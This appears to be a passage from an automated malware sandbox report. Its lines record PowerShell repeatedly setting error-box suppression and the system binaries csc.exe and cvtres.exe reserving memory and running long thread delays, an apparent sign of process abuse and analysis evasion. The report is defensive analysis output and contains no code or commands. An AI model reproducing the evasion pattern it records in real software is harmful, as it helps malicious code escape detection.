                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 5820000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 7440000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 7080000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 2FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599668Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599323Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598962Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598842Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598619Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596374Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596264Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595598Jump to behavior
